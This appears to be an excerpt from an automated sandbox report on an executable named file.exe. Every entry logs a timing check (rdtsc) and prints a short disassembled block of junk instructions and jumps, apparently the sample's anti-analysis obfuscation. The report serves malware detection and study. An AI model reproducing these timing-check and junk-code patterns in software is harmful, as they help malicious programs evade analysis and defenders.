                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A46B66 second address: A46B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E493 second address: A4E4B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F0B44BD79A6h 0x0000000a popad 0x0000000b jmp 00007F0B44BD79AAh 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007F0B44BD79A6h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E4B2 second address: A4E4B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E4B6 second address: A4E4BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E613 second address: A4E62E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C87h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E7B4 second address: A4E7B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4E7B8 second address: A4E7C2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F0B44EA8C76h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A4EA91 second address: A4EAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F0B44BD79A6h 0x0000000a popad 0x0000000b jg 00007F0B44BD79B2h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52770 second address: A5277A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A527F5 second address: A52813 instructions: 0x00000000 rdtsc 0x00000002 jng 00007F0B44BD79A8h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0B44BD79ADh 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52813 second address: A52817 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52817 second address: A5281D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5281D second address: A52858 instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B44EA8C78h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b or dword ptr [ebp+122D209Eh], eax 0x00000011 or dword ptr [ebp+122D2C9Ah], ecx 0x00000017 push 00000000h 0x00000019 xor dword ptr [ebp+122D2C1Bh], edi 0x0000001f call 00007F0B44EA8C79h 0x00000024 jmp 00007F0B44EA8C7Ah 0x00000029 push eax 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push edx 0x0000002f pop edx 0x00000030 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52858 second address: A5285C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A5285C second address: A52862 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B01 second address: A52B2E instructions: 0x00000000 rdtsc 0x00000002 jne 00007F0B44BD79ACh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push esi 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f push esi 0x00000010 pop esi 0x00000011 popad 0x00000012 pop esi 0x00000013 mov eax, dword ptr [esp+04h] 0x00000017 push eax 0x00000018 push edx 0x00000019 jmp 00007F0B44BD79AEh 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B2E second address: A52B51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F0B44EA8C83h 0x00000008 push esi 0x00000009 pop esi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov eax, dword ptr [eax] 0x0000000f push eax 0x00000010 push edx 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A52B51 second address: A52B56 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A361D9 second address: A361ED instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F0B44EA8C7Eh 0x0000000c push esi 0x0000000d pop esi 0x0000000e jg 00007F0B44EA8C76h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A361ED second address: A3621D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F0B44BD79B8h 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A701C9 second address: A701CD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A701CD second address: A701DA instructions: 0x00000000 rdtsc 0x00000002 jno 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A701DA second address: A701E0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70349 second address: A7034E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A704E0 second address: A704E4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A704E4 second address: A704EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70670 second address: A7067A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jl 00007F0B44EA8C76h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7067A second address: A706A4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnl 00007F0B44BD79AEh 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A706A4 second address: A706CB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C7Bh 0x00000009 jmp 00007F0B44EA8C88h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70859 second address: A7087D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B44BD79A6h 0x0000000a popad 0x0000000b ja 00007F0B44BD79AEh 0x00000011 jc 00007F0B44BD79A8h 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70B70 second address: A70BA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jc 00007F0B44EA8C76h 0x00000010 jg 00007F0B44EA8C76h 0x00000016 jmp 00007F0B44EA8C7Ah 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e push ecx 0x0000001f pop ecx 0x00000020 jno 00007F0B44EA8C76h 0x00000026 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BA0 second address: A70BAA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B44BD79A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BAA second address: A70BB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70BB6 second address: A70BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70D2D second address: A70D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F0B44EA8C7Bh 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70E80 second address: A70E99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F0B44BD79B3h 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A70E99 second address: A70EB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jmp 00007F0B44EA8C81h 0x0000000a pop eax 0x0000000b pushad 0x0000000c jg 00007F0B44EA8C76h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A678E3 second address: A678ED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A678ED second address: A678FD instructions: 0x00000000 rdtsc 0x00000002 jg 00007F0B44EA8C76h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pop esi 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A678FD second address: A67901 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67901 second address: A6791B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 jmp 00007F0B44EA8C7Fh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6791B second address: A67926 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 popad 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A67926 second address: A6792A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6792A second address: A6792E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A6792E second address: A6796E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F0B44EA8C78h 0x0000000e push eax 0x0000000f pop eax 0x00000010 jmp 00007F0B44EA8C83h 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F0B44EA8C89h 0x0000001c push eax 0x0000001d pop eax 0x0000001e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A34756 second address: A3475C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A71551 second address: A7155B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A742D3 second address: A742E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 jmp 00007F0B44BD79AAh 0x0000000a pop edx 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A742E8 second address: A742F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A4C second address: A77A50 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A50 second address: A77A56 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A56 second address: A77A5B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A5B second address: A77A81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnp 00007F0B44EA8C76h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F0B44EA8C85h 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77A81 second address: A77A85 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77BC4 second address: A77BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F0B44EA8C87h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A77BDF second address: A77BE3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D9D2 second address: A7D9D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D9D8 second address: A7D9E8 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jo 00007F0B44BD79A6h 0x0000000e push edx 0x0000000f pop edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7D9E8 second address: A7DA01 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DA01 second address: A7DA1D instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push esi 0x00000004 pop esi 0x00000005 pop ebx 0x00000006 ja 00007F0B44BD79BAh 0x0000000c jmp 00007F0B44BD79AEh 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DA1D second address: A7DA3C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007F0B44EA8C87h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DBDA second address: A7DBE7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 ja 00007F0B44BD79A6h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DBE7 second address: A7DC04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 jnp 00007F0B44EA8C76h 0x0000000c popad 0x0000000d jmp 00007F0B44EA8C7Ch 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7DD61 second address: A7DD6D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 popad 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E00D second address: A7E016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E016 second address: A7E01A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E01A second address: A7E027 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E027 second address: A7E02D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E173 second address: A7E17D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E17D second address: A7E181 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A7E181 second address: A7E187 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81F38 second address: A81F3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81F3D second address: A81F43 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A81F43 second address: A81F5B instructions: 0x00000000 rdtsc 0x00000002 ja 00007F0B44BD79A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jng 00007F0B44BD79B0h 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82651 second address: A8265F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C7Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BAB second address: A82BAF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82BAF second address: A82C01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop esi 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a jmp 00007F0B44EA8C80h 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007F0B44EA8C76h 0x00000019 push eax 0x0000001a pop eax 0x0000001b popad 0x0000001c popad 0x0000001d nop 0x0000001e jp 00007F0B44EA8C7Ch 0x00000024 xchg eax, ebx 0x00000025 jmp 00007F0B44EA8C82h 0x0000002a push eax 0x0000002b pushad 0x0000002c push eax 0x0000002d push ecx 0x0000002e pop ecx 0x0000002f pop eax 0x00000030 push eax 0x00000031 push edx 0x00000032 push eax 0x00000033 push edx 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A82C01 second address: A82C05 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8301C second address: A83020 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A83020 second address: A83025 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8399A second address: A8399E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A8399E second address: A839A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A839A4 second address: A839D7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44EA8C89h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007F0B44EA8C82h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A839D7 second address: A839DB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A839DB second address: A839E5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A84AA6 second address: A84AAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A85576 second address: A855EF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F0B44EA8C7Ch 0x0000000c jo 00007F0B44EA8C76h 0x00000012 popad 0x00000013 mov dword ptr [esp], eax 0x00000016 push 00000000h 0x00000018 push ebx 0x00000019 call 00007F0B44EA8C78h 0x0000001e pop ebx 0x0000001f mov dword ptr [esp+04h], ebx 0x00000023 add dword ptr [esp+04h], 00000018h 0x0000002b inc ebx 0x0000002c push ebx 0x0000002d ret 0x0000002e pop ebx 0x0000002f ret 0x00000030 mov esi, dword ptr [ebp+124560E0h] 0x00000036 push 00000000h 0x00000038 push 00000000h 0x0000003a push eax 0x0000003b call 00007F0B44EA8C78h 0x00000040 pop eax 0x00000041 mov dword ptr [esp+04h], eax 0x00000045 add dword ptr [esp+04h], 00000014h 0x0000004d inc eax 0x0000004e push eax 0x0000004f ret 0x00000050 pop eax 0x00000051 ret 0x00000052 mov esi, dword ptr [ebp+122D39EDh] 0x00000058 push 00000000h 0x0000005a sbb di, 49D3h 0x0000005f push eax 0x00000060 pushad 0x00000061 jl 00007F0B44EA8C7Ch 0x00000067 push eax 0x00000068 push edx 0x00000069 push ecx 0x0000006a pop ecx 0x0000006b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A852D6 second address: A852EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 jo 00007F0B44BD79A6h 0x0000000b pushad 0x0000000c popad 0x0000000d popad 0x0000000e popad 0x0000000f push eax 0x00000010 pushad 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A852EA second address: A852F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 je 00007F0B44EA8C76h 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A86B05 second address: A86B88 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F0B44BD79B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c jmp 00007F0B44BD79B9h 0x00000011 pop edi 0x00000012 nop 0x00000013 jmp 00007F0B44BD79AFh 0x00000018 push 00000000h 0x0000001a push 00000000h 0x0000001c push ebp 0x0000001d call 00007F0B44BD79A8h 0x00000022 pop ebp 0x00000023 mov dword ptr [esp+04h], ebp 0x00000027 add dword ptr [esp+04h], 0000001Ch 0x0000002f inc ebp 0x00000030 push ebp 0x00000031 ret 0x00000032 pop ebp 0x00000033 ret 0x00000034 mov dword ptr [ebp+122D1EFDh], ebx 0x0000003a push 00000000h 0x0000003c xchg eax, ebx 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007F0B44BD79AAh 0x00000044 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A875FD second address: A87608 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jnp 00007F0B44EA8C76h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: A868D0 second address: A868DA instructions: 0x00000000 rdtsc 0x00000002 jl 00007F0B44BD79ACh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
